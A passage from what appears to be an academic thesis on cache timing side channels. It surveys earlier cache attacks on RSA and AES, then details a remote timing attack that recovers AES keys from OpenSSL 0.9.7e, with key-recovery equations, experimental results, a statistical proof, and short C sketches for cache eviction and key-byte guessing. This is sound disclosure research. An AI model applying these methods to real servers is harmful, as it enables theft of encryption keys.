operates. If reading a cache set takes longer, the attacker can conclude that this set was accessed during the time interval between the last read of the set by the spy process and the current read. In this sense, it is a combined trace-driven and access-driven cache attack. This attack reveals the ‘footprints’ of a process, i.e., the steps that this process follows. In case of RSA, Percival was able to identify the order of squaring and multiplication operations in OpenSSL’s implementation that employs sliding windows exponentiation with a window size of 5 bits. The known sequence of these operations gives 200 bits of information about each of the two 512-bit secret exponents. If it is also possible to distinguish each multiplier, based on the cache sets they map to, then the adversary can directly obtain the value of both exponents. The same attack can straightforwardly recover the exponents, if square and multiply exponentiation is used in the implementation. 4.2.5. Osvik-Shamir-Tromer (OST) Attacks Osvik, Shamir, and Tromer used a similar idea to attack AES [73]. 
4.2.5. Osvik-Shamir-Tromer (OST) Attacks

Osvik, Shamir, and Tromer used a similar idea to attack AES [73]. They described and simulated several different methods to perform local cache attacks. They make use of a local array and exploit the collisions between AES table lookups and the accesses to this array. None of their methods can be used as a remote attack, e.g., an attack over a local network, unless the attacker is able to manipulate the cache remotely. In their attack model, the adversary reads garbage data to load it into the cache, waits for someone else to start an encryption, and after the encryption he reads the garbage data again to find the cache sets accessed by the AES process. Clearly, this attack is very similar to the model in Subsection 4.1.1.1 and it is an access-driven attack. In the OST attack, the adversary analyzes the cache sets that are accessed during the first two rounds of AES and predicts the table lookup indices. Then, he recovers the key with the knowledge of these indices. This attack is very efficient and requires only 300 encryptions on AMD Athlon and 16000 encryptions on Pentium 4.

4.2.6. Last Round Access-Driven Attack

Osvik et al.'s access-driven attack considers the accesses of the first two AES rounds. Neve et al. improved this attack by taking the last round accesses into consideration. The most widely used AES implementation employs a single lookup table, called T4, for the last round computations (c.f. Section 2.2.2). The adversary completely evicts T4 from the cache by reading a local array before an AES computation, as done in [73] (c.f. Sections 4.2.5 and 4.1.1.1). After the AES execution, he determines which data blocks of T4 were accessed by the cipher. Then he eliminates the values that cannot be the correct values of the last round key bytes, using the knowledge of the unaccessed data blocks and the ciphertext value. The adversary continues to apply this elimination method by collecting data from other AES executions until he finds the correct round key. This attack is calculated to require fewer than 13 encryptions on average in an ideal environment to break AES on systems that have a cache line size of 64 bytes.

4.2.7. Cache-based Power Attack on AES from Bertoni et al.

Bertoni et al. devised a cache based power attack on AES that can theoretically break the cipher with 512 encryptions [15]. They realized that cache misses are easily observable through power analysis, at least in a simulation environment. In this attack, the adversary is assumed to know the exact location of the AES S-box, the exact implementation, and the details of the cache architecture, i.e., cache size, block size, and associativity. He first triggers the AES computation to load the S-box into the cache. Then, he evicts a particular S-box entry from the cache and runs AES again, but this time he also measures the power consumption of the execution. If AES accesses this particular entry during the computation, the adversary can detect if and when it happens. Therefore, he can understand which S-box lookup causes an access to that particular entry. Performing the same method with each S-box entry allows the adversary to determine the indices of the AES lookups. Bertoni et al. tested their attack in a simulation environment using the Simplescalar-3.0 toolset [11, 22] and Power Analyzer [55], a library for power modelling that can be integrated into Simplescalar. We want to mention that their attack is theoretical, because they did not consider the practical issues that arise in an actual attack.

4.2.8. Lauradoux's Power Attack on AES

Another cache power attack is from Lauradoux [62].
He presented a cache attack on AES that exploits internal cache collisions instead of the external collisions that were used in Bertoni et al.'s attack. This attack analyzes the power consumption of the AES execution to detect the occurrences of internal collisions during the first AES round. This knowledge allows an adversary to reveal the values of certain key byte differences and immediately reduces the exhaustive search space from 128 bits to 80 bits. The basic underlying idea presented in [62] is similar to our first round attack (c.f. Section 5.2.1).

4.2.9. Internal Cache Collision Attacks by Bonneau et al.

Bonneau et al. documented possible internal collision based time-driven cache attacks in [18]. Their experimental results show that their most effective attack, which considers the collisions that occur during the last round of AES, requires between 2^13 and 2^20 encryptions to break the cipher. This last round attack requires the least number of encryptions among all of the time-driven cache attacks presented above.

4.2.10. Overview of Our Cache Attacks

Although the results presented in [18] seem to be low, they do not reflect actual situations. Bonneau et al.'s experiments, along with those given in [14], were conducted in a hypothetical environment without considering realistic scenarios. In all of these experiments, the AES encryption is executed via a function call, and the execution time of this internal AES function is measured and used in the analysis. However, in a real attack, there is no way that an adversary can execute inside his own process an AES cipher that operates with a secret key owned by someone else. The cipher and the attack tool have to be different, unrelated processes running on the same or different machines connected via a network. Therefore, an actual attack suffers from measurement noise due to network delays, stack delays, and the like. Although the findings of [14, 18, 100] indicate the feasibility of these cache attacks on real security systems in principle, they do not give the computational requirements of actual attacks or prove their practicality.

There are many studies on cache attacks in the literature and many attempts to develop a remote cache attack that can reveal a key on a server running over a network. Despite some claims that remote cache attacks had been devised, which were eventually proven to be wrong, none of these efforts achieved the ultimate goal of developing a generic and universally applicable cache attack that can also compromise remote systems. We show how one can devise and apply such a remote cache attack in the next chapter. We present those ideas in [5] and show how to use them to develop a universal remote cache attack on AES. Our results prove that cache attacks cannot be considered as purely local attacks and that they can be applied to software systems running over a network. Furthermore, in Chapter 6, we analyze trace-driven cache attacks, which are one of the three types of cache attacks identified so far. We construct an analytical model for trace-driven attacks that enables one to analyze such attacks on different implementations and different platforms [3, 4]. We also develop very efficient trace-driven attacks on AES and apply our model to those attacks as a case study. We show that trace-driven attacks have more potential than what is stated in previous works.
5. CACHE BASED REMOTE TIMING ATTACK ON THE AES

All of the cache attacks presented in the previous chapter, except [14], either assume that the cache does not contain any data related to the encryption process prior to each encryption or explicitly force the cache architecture to replace some of the cipher data. The implementations of Tsunoo et al. accomplish the so-called 'cache cleaning' by loading some garbage data into the cache to clean it before each encryption [100, 101]. The need for cache cleaning makes it impossible for such an attack to reveal information about cryptosystems on remote machines, because the attacker must have access to the computer to perform cache cleaning. They did not investigate whether their attacks could successfully recover the key without employing explicit cache cleaning on certain platforms. The attacks described in [73] replace the cipher data in the cache with garbage data by loading the content of a local array into the cache. Again, the attacker needs access to the target platform to perform these attacks. Therefore, none of the mentioned studies could be considered practical for remote attacks over a network, unless the attacker is able to manipulate the cache remotely.

In this chapter, we present a robust and effective cache attack, which can be used to compromise remote systems, on the AES implementation described in [31] for 32-bit architectures. Although our basic principles can be used to develop similar attacks on other implementations, we only focus on this particular implementation stated above and described in Section 2.2.2. We show that it is possible to apply a cache attack without employing cache cleaning or explicitly aimed cache manipulations when the cipher under attack is running on a multitasking system, especially on a busy server. In our experiments we run a dummy process simultaneously with the cipher process. Our dummy process randomly issues memory accesses and eventually causes the eviction of AES data from the cache. This should not be considered a form of intentional cache cleaning, because we use this dummy process only to imitate a moderate workload on the server. In the presence of other processes that run on the same machine as the cipher process, the memory accesses issued by these processes automatically evict the AES data, i.e., cause the same effect as our dummy process on the execution of the cipher.

5.1. The Underlying Principle of Devising a Remote Cache Attack

Multitasking operating systems allow the execution of multiple processes on the same computer, concurrently. In other words, each process is given permission to use the resources of the computer, not only the processor but also the cache and other resources. Although it depends on the cache architecture and the replacement policy, we can roughly say that the cache contains the most recently used data almost all the time. If an encryption process stalls for enough time, the cipher data will be completely removed from the cache, given the presence of other processes on the machine. In a simultaneous multithreading system, the encryption process does not even have to stall. The data of the process, especially parts of large tables, is replaced by other processes' data on-the-fly, if there is enough workload on the system. The results of our experiments show that the attack can work in such a case in a simultaneous multithreading environment. The reader should note that our results also point out that remote systems are vulnerable to Tsunoo et al.'s attack on DES as well.
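A minimal sketch of such a dummy workload generator might look as follows; it follows the description given later in Section 5.4 (random accesses to an 8 KB array), but the exact code, the use of rand(), and the constants are illustrative assumptions rather than the program used in our experiments.

#include <stdint.h>
#include <stdlib.h>

#define ARRAY_SIZE (8 * 1024)     /* 8 KB, comparable in size to the AES tables */

int main(void)
{
    static volatile uint8_t junk[ARRAY_SIZE];
    volatile uint8_t sink = 0;

    srand(12345);
    for (;;) {
        /* Random reads eventually touch every cache set, so the AES tables of a
           co-resident cipher process are evicted piece by piece without any
           explicit, targeted cache manipulation. */
        sink ^= junk[rand() % ARRAY_SIZE];
    }
}

Any ordinary workload on the server has the same effect; such a dummy program merely guarantees a moderate level of cache pressure during the experiments.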
5.2. Details of Our Basic Attack

In this section we outline an example cache attack on AES with a key size of 128 bits. In our experiments we consider the 128-bit AES version with a block length of 128 bits. Our attack can be adjusted to AES with key length 192 or 256 in a straightforward manner (cf. Subsect. 5.3). The basic attack consists of two different stages, considering table lookups from the first and second round, respectively. The basic attack may be considered an adaptation of the ideas from the earlier cache attack works to a timing attack on AES, since similar equations are used. Our improved attack variant is a completely novel approach. It employs a different decision strategy than the basic one and is much more efficient. It does not consist of different stages but instead decomposes into sixteen independent 8-bit guessing problems.

The differences of our approaches from the earlier works are the following. First of all, we exploit the internal collisions, i.e., the collisions between different table lookups of the cipher. Some of the earlier works (e.g. [73, 67, 77, 15]) exploit the cache collisions between the memory accesses of the cipher and another process. Exploiting such external collisions mandates the use of explicit local cache manipulations by (e.g.) having access to the target machine and reading a local data structure. This necessity makes these attacks unable to compromise remote systems. On the other hand, taking advantage of internal collisions removes this necessity and enables one to devise remote attacks, as shown in this chapter. The idea of using internal collisions is employed in some of the previous works, e.g. in [101, 100, 62]. The earlier timing attacks that rely on internal collisions perform the so-called cache cleaning, which is also a form of explicit local cache manipulation. These works did not realize the possibility of automatic cache evictions due to the workload on the system, and therefore could not show the feasibility of remote attacks.

We use the second attack model explained in the previous chapter. The attack model discussed in Section 4.1.1.2 is partially correct, except that it does not account for the fact that two different accesses to the same cache line may even increase the overall execution time. We realized during our experimentation that an internal collision, i.e., a cache hit, at a particular AES access either shortens or lengthens the overall execution time. The latter phenomenon may occur if a cache hit occurs from a logical point of view but the respective cache line has not already been loaded, inducing double work. Thus, if we gather a sample of messages and each of these messages generates a cache hit during the same access, then the execution time distribution of this sample will be significantly different from that of a random sample. We use this fact to develop our attacks on the AES.

5.2.1. First Round Attack

The implementation we analyze is described in [31] and it is widely used on 32-bit architectures (c.f. Section 2.2.2). The first 4 references to the first table, T0, are:

P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .

If any two of these four references are forced to map to the same cache line for a sample of plaintexts, then we know that this will affect the average execution time.
For example, if we assign the value ⟨P0 ⊕ K0 ⊕ K4⟩ to ⟨P4⟩, i.e.,

⟨P4⟩ = ⟨P0 ⊕ K0 ⊕ K4⟩

for a large sample of plaintexts, then the timing characteristics of this sample will be different from those of a randomly chosen sample. We can use this fact to guess the correct key byte difference ⟨K0 ⊕ K4⟩. Using the same idea, we can find all key byte differences ∆i,j = ⟨Ki ⊕ Kj⟩ with i, j ∈ {0, 4, 8, 12}. For properly selected indices (i1, j1), (i2, j2), (i3, j3), i.e., if the GF(2)-linear span of {Ki1 ⊕ Kj1, Ki2 ⊕ Kj2, Ki3 ⊕ Kj3} contains all six XOR sums K0 ⊕ K4, K0 ⊕ K8, ..., K8 ⊕ K12, then each ∆i,j follows immediately from ∆i1,j1, ∆i2,j2 and ∆i3,j3. We can further reduce the search space by considering the accesses to the other three tables T1, T2 and T3. In general, we can obtain ⟨Ki ⊕ K4*j+i⟩ for i, j ∈ {0, 1, 2, 3}. Since (8 − ℓ) is the size, in bits, of the most significant part of a table lookup index (c.f. Section 4.1.1.2), the first round attack allows us to reduce the search space by 12 * (8 − ℓ) bits. The parameter ℓ depends on the cache architecture. For ℓ = 0, which constitutes the theoretical lower bound, the search space for a 128 bit key becomes only 32 bits. For ℓ = 4 the search space is reduced by 48 bits, yielding an 80-bit problem. On widely used processors, the search space typically reduces to 56, 68, or 80 bits for 128-bit keys. In the environment where we performed our experiments the cache line size of the L1 cache is 64 bytes, i.e., the most significant part of a key byte difference is 4 bits long. In other words, we can only obtain the first 4 bits of Ki ⊕ K4*j+i and the remaining 4 bits have to be searched exhaustively unless we use a second round attack.
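A minimal sketch of this first round decision rule might look as follows; it guesses only ⟨K0 ⊕ K4⟩, assumes ℓ = 4 (i.e., 16 candidates), and takes a pre-collected array of (plaintext, execution time) pairs as input. The data layout, function name, and use of the sample mean are illustrative assumptions, not the code used in our experiments.

#include <math.h>
#include <stddef.h>
#include <stdint.h>

#define ELL    4                       /* assumed: 64-byte lines, 4-byte entries */
#define NCAND  (1 << (8 - ELL))        /* candidates for <K0 xor K4>             */

typedef struct {
    uint8_t pt[16];                    /* plaintext block                         */
    double  time;                      /* measured encryption time (clock cycles) */
} sample_t;

/* Return the most likely value of the top (8 - ELL) bits of K0 xor K4. */
int guess_k0_xor_k4(const sample_t *s, size_t n)
{
    double sum[NCAND] = {0.0}, total = 0.0;
    size_t cnt[NCAND] = {0};

    /* Partition the samples according to <P0 xor P4>. The bucket whose value
       equals <K0 xor K4> is exactly the set of plaintexts that produce an
       internal collision between the first two T0 lookups. */
    for (size_t i = 0; i < n; i++) {
        int d = (s[i].pt[0] ^ s[i].pt[4]) >> ELL;
        sum[d] += s[i].time;
        cnt[d]++;
        total += s[i].time;
    }
    total /= (double)n;

    /* Pick the bucket whose average execution time deviates most from the
       overall average. */
    int best = 0;
    double bestdev = -1.0;
    for (int d = 0; d < NCAND; d++) {
        if (cnt[d] == 0)
            continue;
        double dev = fabs(sum[d] / (double)cnt[d] - total);
        if (dev > bestdev) { bestdev = dev; best = d; }
    }
    return best;
}

The same routine, applied to the appropriate plaintext byte pairs, yields every ⟨Ki ⊕ K4*j+i⟩; the remaining key bits are then obtained with the second round attack described next.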
5.2.2. Second Round Attack – Basic Variant

Using the guesses from the first round, a similar guessing procedure can be applied in the second round to obtain the remaining key bits. We briefly explain an approach that exploits only accesses to T0, i.e., the first table. To simplify notation we set ∆i := Pi ⊕ Ki in the remainder of this section. In the second round, the encryption accesses T0 four times, namely to obtain the values

2 • s(∆8) ⊕ 3 • s(∆13) ⊕ s(∆2) ⊕ s(∆7) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ 0x01   (5.1)
2 • s(∆0) ⊕ 3 • s(∆5) ⊕ s(∆10) ⊕ s(∆15) ⊕ s(K13) ⊕ K0 ⊕ 0x01   (5.2)
2 • s(∆4) ⊕ 3 • s(∆9) ⊕ s(∆14) ⊕ s(∆3) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ 0x01   (5.3)
2 • s(∆12) ⊕ 3 • s(∆1) ⊕ s(∆6) ⊕ s(∆11) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ K12 ⊕ 0x01   (5.4)

where s(x) and • stand for the result of an AES S-box lookup for the input value x and the finite field multiplication in GF(2^8) as it is realized in AES, respectively. If the first access (P0 ⊕ K0) touches the same cache line as (5.1) for each plaintext within a sample, i.e., if

⟨P0⟩ = ⟨2 • s(∆8) ⊕ 3 • s(∆13) ⊕ s(∆2) ⊕ s(∆7) ⊕ s(K13) ⊕ K4 ⊕ K8 ⊕ 0x01⟩   (5.5)

the expected average execution time will be different than for a randomly chosen sample. If we assume that the value ⟨K4 ⊕ K8⟩ has been correctly guessed within the first round attack, this suggests the following procedure.

1. Phase: Obtain a sample of N many (plaintext, execution time) pairs.

2. Phase: Divide the entirety of all (plaintext, execution time) pairs into 2^32 (overlapping) subsets, one set for each candidate (K̃2, K̃7, K̃8, K̃13) value. Put each plaintext into all sets that correspond to candidates (K̃2, K̃7, K̃8, K̃13) that satisfy the above equation. Note that a particular plaintext should be contained in about N/2^(8−ℓ) different subsets.

3. Phase: Calculate the timing characteristics of each set, i.e., the average execution time in our case. Compute the absolute difference between each average and the average execution time of the entire sample. There will be a total of 2^(4·8) timing differences, each corresponding to a different candidate value of (K̃2, K̃7, K̃8, K̃13). The set with the largest difference should point to the correct values for these 4 bytes.

Hence, we can search through all candidates (K2, K7, K8, K13) ∈ GF(2)^32 to guess the true values. Applying the same idea to (5.2) to (5.4) we can recover the full AES key. Note that in each of the consecutive steps only 4 · 4 = 16 key bits have to be guessed, since Ki and the most significant bits of some other Kj follow from the first step and ∆i,j from the first round attack (cf. Sect. 5.2.1), where i is a suitable index in {2, 7, 8, 13}. The bottleneck is clearly the first step, since one has to distinguish between 2^32 key hypotheses rather than between 2^16. Experimental results are given in Sect. 5.4. In the next section we introduce a more efficient variant that saves both samples and computations.

5.3. A More Efficient, Universally Applicable Attack

In the previous section, we explained a second round attack where 32, resp. 16, key bits have to be guessed simultaneously. In this section we introduce another approach that allows independent searches for single key bytes. It is universally applicable in the sense that it could also be applied in any subsequent round, e.g. to attack AES with 256 bit keys. We explain our idea using (5.1). Our goal is to guess key byte K8. Recall that access to the same cache line as for (P0 ⊕ K0) is required in the second round iff (5.5) holds. If we fix the four plaintext bytes P0, P2, P7, and P13, then (5.5) simplifies to

⟨c⟩ = ⟨2 • s(∆8)⟩   (5.6)

with an unknown constant c = c(K0, K2, K4, K7, K8, K13, P0, P2, P7, P13). We observe encryptions with randomly selected plaintext bytes Pi for i ∉ {0, 2, 7, 13} and evaluate the timing characteristics with regard to all 256 possible values of P8. For the most relevant case, i.e. ℓ = 4, there are 16 plaintext bytes (2^ℓ in the general case) that yield the correct (but unknown) value ⟨2 • s(∆8)⟩ that meets (5.5). Ideally, with regard to the timing characteristics, these 16 plaintext bytes should be ranked first, pointing at the true subkey K8, i.e., at a key byte that gives identical right-hand sides ⟨2 • s(∆8)⟩ for all these 16 plaintext bytes. The ranking is done similarly as in Section 5.2.1. To rank the 256 P8-bytes one calculates, for each subset with equal P8 values, the absolute difference of its average execution time from the average execution time of all samples. The set with the highest difference is ranked first, and so on. In a practical attack our decision rule says that we decide for that key byte candidate K̃8 for which a maximum number of the t (e.g. t = 16) top-ranked plaintext bytes yield identical ⟨2 • s(∆8)⟩ values. If the decision rule does not clearly point to one subkey candidate, we may perform the same attack with a second plaintext byte P0′ for which ⟨P0⟩ ≠ ⟨P0′⟩ while we keep P2, P7, P13 fixed (changing ⟨c⟩ to ⟨c′⟩ := ⟨c⟩ ⊕ ⟨P0 ⊕ P0′⟩). Applying the same decision rule as above, we obtain a second ranking of the subkey candidates. Clearly, if P8 and P8′ meet (5.6) for P0 and P0′, resp., then

⟨P0 ⊕ P0′⟩ = ⟨2 • s(P8 ⊕ K8)⟩ ⊕ ⟨2 • s(P8′ ⊕ K8)⟩.   (5.7)

Equation (5.7) may be used as a control equation for probable subkey candidates K̃8.
From the rankings of P̃8 and P̃8′, we derive an order for the pairs (P̃8, P̃8′), e.g. by adding the ranks of the components or their absolute distances from the respective means. For highly ranked pairs (P̃8, P̃8′) we substitute (P̃8, P̃8′, k̃) into control equation (5.7), where k̃ is a probable subkey candidate from the 'elementary' attacks. We note that the attack described above can be applied to exploit the relation between any two table lookups. By reordering a type (5.5) equation one obtains an equation of type (5.6) whose right-hand side depends only on one key byte (to be guessed) and one plaintext byte. The plaintext bytes that affect the left-hand side are kept constant during the attack. The whole key could be recovered by 16 independent one-key-byte guessing problems. We mention that the (less costly) basic first round attacks might be used to check the guessed subkey candidates K̃0, ..., K̃15.

5.3.1. Comparison with the basic second round attack from Subsect. 5.2.2

For sample size N the 'bottleneck' of the basic second round attack, the 32 bit guessing step, requires the computation of the average execution times of 2^32 sample subsets of size ≈ N/2^(8−ℓ). In contrast, each of the 16 runs of the improved attack variant only requires the computation of the average execution times of 256 subsets of size ≈ N_I/256 (with N_I denoting the sample size for an individual guessing problem) and sorting two lists with 256 elements (plaintexts and key byte candidates). Even more important, 16·N_I will turn out to be clearly smaller than N (cf. Sect. 5.4). The only drawback of the improved variant is that it is a chosen-input attack, i.e., it requires an active role of the adversary. In contrast, the basic variant explained in the previous section is in principle a known-plaintext attack, which means an adversary does not have to actively interfere with the execution of the encryption process, i.e., the attack can be carried out by monitoring the traffic of the encryption process. However, this is only true for the (less important) so-called innerprocess attacks (cf. Section 5.4 for details). For 'real' attacks (interprocess and remote attacks) the basic variant is performed as a chosen-input attack, too, since the attacker needs to choose the plaintext to be encrypted as the concatenation of several identical 128 bit strings in order to increase the signal-to-noise ratio.

5.4. Experimental Details and Results

We performed two types of experimental attacks, which we call innerprocess and interprocess attacks, to test the validity of our attack variants. In the innerprocess attack we generated random single-block messages and measured their encryption times under the same key. The encryption was just a function that is called by the application to process a message. The execution time of the cryptosystem was obtained by calculating the difference between the time just before the function call and immediately after the function return. Therefore, there was minimal noise and the execution time was measured almost exactly. For the second part of the experiments, i.e., the interprocess attack, we implemented a simple TCP server and a client program that exchange ASCII strings during the attack. The server reads the queries sent by the client and sends a response after encrypting each of them. The client measures the time between sending a message and receiving the reply. These measurements were used to guess the secret key.
The server and client applications run on the same machine in this attack. There was no transmission delay in the time measurements, but network stack delays were present. Brumley and Boneh pointed out that a real remote attack over a network is in principle able to break a remote cipher when the interprocess version of the same attack works successfully. Furthermore, their experiments also show that their actual remote attack requires roughly the same number of samples as the interprocess version [21]. Therefore, we only performed interprocess experiments. Applying an interprocess attack successfully is sufficient evidence to claim that the actual remote version would also work with (most likely) a larger sample size.

We performed our attack against OpenSSL version 0.9.7e. All of the experiments were run on a 3.06 GHz HT-enabled Xeon machine with a Linux operating system. The source code was compiled using the gcc compiler version 3.2.3 with default options. We used random plaintexts generated by the rand() and srand() functions available in the standard C library. The current time is fed into the srand() function, serving as the seed for the pseudorandom number generator. We measured time in terms of clock cycles using the cycle counter. For the experiments of the innerprocess attack, we loaded 8 KB of garbage data into the L1 cache before each encryption to remove all AES data from the first level cache. We did not employ this type of cache cleaning during the experiments of the interprocess attack. Instead, we wrote a simple dummy program that randomly accesses an 8 KB array and ran this program simultaneously with the server in order to imitate the effect of a workload on the computer.

We used two parameters in our experiments.

1. Sample Size (N): This is the number of different (plaintext, execution time) pairs collected during the first phase of the attacks. We have to use a large enough sample of queries to obtain accurate statistical characteristics of the system. However, a very large sample size causes an unnecessary increase in the cost of the attack.

2. Message Length (L): This is the number of message blocks in each query. We concatenated a single random block L many times with one another to form the actual query. L was 1 during the innerprocess attack, i.e., each query was a single block, whereas it was 1024 in the interprocess attack. This parameter is used to increase the signal-to-noise ratio in the case of having network delays in the measurements.

We performed our attacks on the variant of AES that has 128-bit key and block sizes. The cache line size of the L1 cache is 64 bytes, which makes ℓ = 4 bits. The cipher was run in ECB mode. In our experiments, we performed all second round guessing problems for the basic attack with only 2^12 different key hypotheses, one of them being the correct key combination. Our intention was to demonstrate the general principle but to save many encryptions. In this way, we reduced the complexity of the 'bottleneck' exhaustive search by even more than a factor of 2^20, since fewer samples are sufficient for the reduced search space. For the innerprocess attack, collecting 2^18 samples was enough to find the correct value of the key. Since we only considered 2^12 different key hypotheses in the second round guessing problems, the required sample size would be more than 2^18 for a real scale innerprocess attack.
In fact, statistical calculations suggest that 4·2^18 samples should be sufficient for 2^32 key hypotheses, although in a strict sense (5.13) only guarantees an error probability of at most 2ε/(1 − c) − ε²/(1 − c)² > 2ε − ε² (cf. Example 1 in Section 5.5). (The right-hand side denotes the error probability for the reduced search space, while c is unknown.) However, since (5.11) is a (pessimistic) lower bound, we may expect that the true error probability is indeed significantly smaller, possibly after increasing the sample size somewhat.

The key experiment is the interprocess attack, which shows the vulnerability of remote servers to such cache attacks. In our experiments, we collected 50 million random but known samples and applied our attack on this sample set. This sample size was clearly sufficient to reveal the correct key value among 2^12 different key hypotheses. Again, the same heuristic arguments indicate the sufficiency of 200 million samples in a real-scale attack. We also estimated the number of required samples in a remote attack over a local network. Rough statistical considerations indicate that increasing the sample size of the interprocess attack by a factor of less than 6 should be sufficient to successfully apply the attack to a remote server.

We tested our improved variant on the same platform with the same settings. The only difference was the set of the plaintexts sent to the server. We only performed the interprocess attack with this new decision strategy. Our experimental results indicate a clear improvement over the basic attack. We could recover a full 128-bit AES key by encrypting slightly more than 6.5 million samples on average for each of the 16 guessing problems, and a total of 106 million queries, each containing L = 1024 message blocks. Recall the further advantage of the improved variant, namely the much lower analysis cost. We want to mention that all of these results correspond to the minimum number of samples for which we got the correct decision from our decision strategy. In a real-life attack an adversary clearly has to collect more samples to be confident of her decisions. More sophisticated stochastic models that are tailored to specific cache strategies will certainly improve the efficiency of our attack.

Our client-server model does not perfectly fit the behavior of an actual security application. In reality, encrypting/decrypting parties do not send responses immediately and perform extra operations besides encryption and decryption. However, this fact does not nullify our client-server model. Although the lower signal-to-noise ratio in actual attacks increases the cost, it does not change the feasibility of our attacks in principle. We want to mention that timing variations caused by extra operations decrease the signal-to-noise ratio. If a security application performs the same operations for each processed message, we expect the 'extra timing variations' to be minimal, in which case the decrease in the signal-to-noise ratio, and thus the increase in the cost of the attack, also remains small.

5.5. Scaling the Sample Size N

In order to save measurements we performed our practical experiments on the basic second round attack from Subsect. 5.2.2 with a reduced key space. Clearly, to maintain the success probability for the full subkey space the sample size N must be increased to N′, since the adversary has to distinguish between more admissible alternatives. In this section we estimate the ratio r := N′/N.
We interpret the measured average execution times for the particular subkey candidates as realizations of normally (Gaussian) distributed random variables, denoted by Y (related to the correct subkey) and X1, ..., X_{m−1} (related to the wrong subkey candidates) for the reduced subkey space, resp. X1, ..., X_{m′−1} when all possible subkeys are admissible. We may assume Y ~ N(µ_A, σ_A²) while X_j ~ N(µ_B, σ_B²) for j ≤ m − 1, resp. for j ≤ m′ − 1, with unknown expectations µ_A and µ_B and variances σ_A² and σ_B². Clearly, µ_A ≠ µ_B, since our attack exploits differences of the average execution times. Since it only exploits the relation between two table lookups, σ_A² ≈ σ_B² seems to be reasonable, the variances clearly depending on N. W.l.o.g. we may assume µ_A > µ_B. We point out that E((X1 + ... + X_{m−1} + Y)/m) ≈ µ_B unless m is very small.

Pr(correct guess) ≈ Pr(|Y − µ_B| > max{|X1 − µ_B|, ..., |X_{m−1} − µ_B|})
  = Pr(min{X1, ..., X_{m−1}} > µ_B − (Y − µ_B), max{X1, ..., X_{m−1}} < Y)
  ≈ Pr(max{X1, ..., X_{m−1}} < Y)²   (5.8)

Unless m is very small the ≈ sign should essentially be "=". If the random variables Y, X1, ..., X_{m−1} were independent we would have

Pr(max{X1, ..., X_{m−1}} ≤ t) = ∏_{j=1}^{m−1} Pr(X_j ≤ t) = Φ((t − µ_B)/σ_B)^(m−1)   (5.9)

where Φ denotes the cumulative distribution function of the standard normal distribution. From (5.9) one immediately deduces

Pr(max{X1, ..., X_{m−1}} < Y) ≈ ∫_{−∞}^{∞} Φ((z − µ_B)/σ_B)^(m−1) f_A(z) dz   (5.10)

where Y has density f_A. In the context of Subsect. 5.2.2 the random variables Y, X1, ..., X_{m−1} are yet dependent. However, for different subkey candidates k_i and k_j the size of the intersection of the respective subsets is small compared to the size of these subsets themselves. Hence we may hope that the influence of the correlation between X_i and X_j is negligible. Under this assumption (5.10) provides a concrete formula for the probability of a true guess. However, this formula cannot be evaluated in practice since µ_A, µ_B and σ_A² ≈ σ_B² are unknown. Instead, we prove a useful lemma.

Lemma 1. (i) Let f denote a probability density, while 0 ≤ g, h ≤ 1 are integrable functions and M_c := {y : g(y) ≤ c}. Assume further that h ≥ g on R \ M_c. Then

∫ h(z)f(z) dz ≥ 1 − ε/(1 − c)   if   ∫ g(z)f(z) dz = 1 − ε .   (5.11)

(ii) Let s, u, b > 1. Then there exists a unique y0 > 0 with Φ(y0·s)^(ub) = Φ(y0)^b. In particular, Φ(y·s)^(ub) > Φ(y)^b iff y > y0.

Proof. Assertion (i) follows immediately from

(1 − c) ∫_{M_c} f(z) dz ≤ ∫_{M_c} (1 − g(z))f(z) dz ≤ ∫ (1 − g(z))f(z) dz = ε ,

and hence

∫ h(z)f(z) dz ≥ ∫_{R\M_c} g(z)f(z) dz = (1 − ε) − ∫_{M_c} g(z)f(z) dz ≥ (1 − ε) − c ∫_{M_c} f(z) dz ≥ 1 − ε − cε/(1 − c) = 1 − ε/(1 − c) .

Since Φ(y·s)^(ub)/Φ(y)^b = (Φ(y·s)^u/Φ(y))^b we may assume b = 1 in the remainder w.l.o.g. Clearly, Φ(y·s)^u < Φ(y) for y < 0. Hence we concentrate on the case y ≥ 0. In particular, log(1 − x) = −x + O(x²) implies

ψ(y) := log(Φ(y·s)^u/Φ(y)) = u·log(Φ(y·s)) − log(Φ(y))
  = u·log(1 − (1 − Φ(y·s))) − log(1 − (1 − Φ(y)))
  = −u(1 − Φ(y·s)) + (1 − Φ(y)) + O((1 − Φ(y))²)
  ≥ (1/√(2π)) (1/y − 1/y³) e^(−y²/2) − (1/√(2π)) (u/(y·s)) e^(−s²y²/2) + O(e^(−y²))
  > 0 for sufficiently large y, and lim_{y→∞} ψ(y) = 0.   (5.12)

We note that the last assertion follows immediately from the definition of ψ, while the '≥' sign is a consequence of a well-known inequality for the tail of 1 − Φ (see, e.g., [36], Chap. VII, p. 175, (1.8)). Since ψ is continuous and ψ(0) = log(0.5^(u−1)) < 0 there exists a minimal y0 > 0 with ψ(y0) = 0.
For any y1 ∈ {y ≥ 0 | ψ′(y) = 0} the second derivative simplifies to ψ″(y1) = t(y1)·Φ′(y1)/Φ(y1) with t(x) := (1 − s²)x + (1 − 1/u)·Φ′(x)/Φ(x). (Note that Φ″(y·s) = −y·s·Φ′(y·s) and Φ″(y) = −y·Φ′(y).) Assume that ψ(y0′) = 0 for some y0′ > y0. As ψ(0) < 0 and ψ(y0) = ψ(y0′) = 0, the function ψ attains a local maximum at some ym ∈ [0, y0′). Since t : [0, ∞) → R is strictly monotonically decreasing, ψ cannot attain a local minimum in (ym, ∞) (with ψ(·) ≤ 0 = ψ(y0′)), which contradicts (5.12). This proves the uniqueness of y0 and completes the proof of (ii).

Our goal is to apply Lemma 1 to the right-hand side of (5.10). We set u := (m′ − 1)/(m − 1), b := 1 and s := √r with r := N′/N. Further, f(z) := f_A(z), g(z) := (Φ((z − µ_B)/σ_B))^(m−1) and h(z) := (Φ(√r·(z − µ_B)/σ_B))^(u(m−1)). By (ii) we have c = Φ((z0 − µ_B)/σ_B)^(m−1) and M_c = (−∞, z0] with g(z0) = h(z0). Lemma 1 and (5.8) imply

Pr(correct guess for (m, N)) = (1 − ε)²  ⇒  Pr(correct guess for (m′, N′ = rN)) ≥ (1 − ε/(1 − c))²   (5.13)

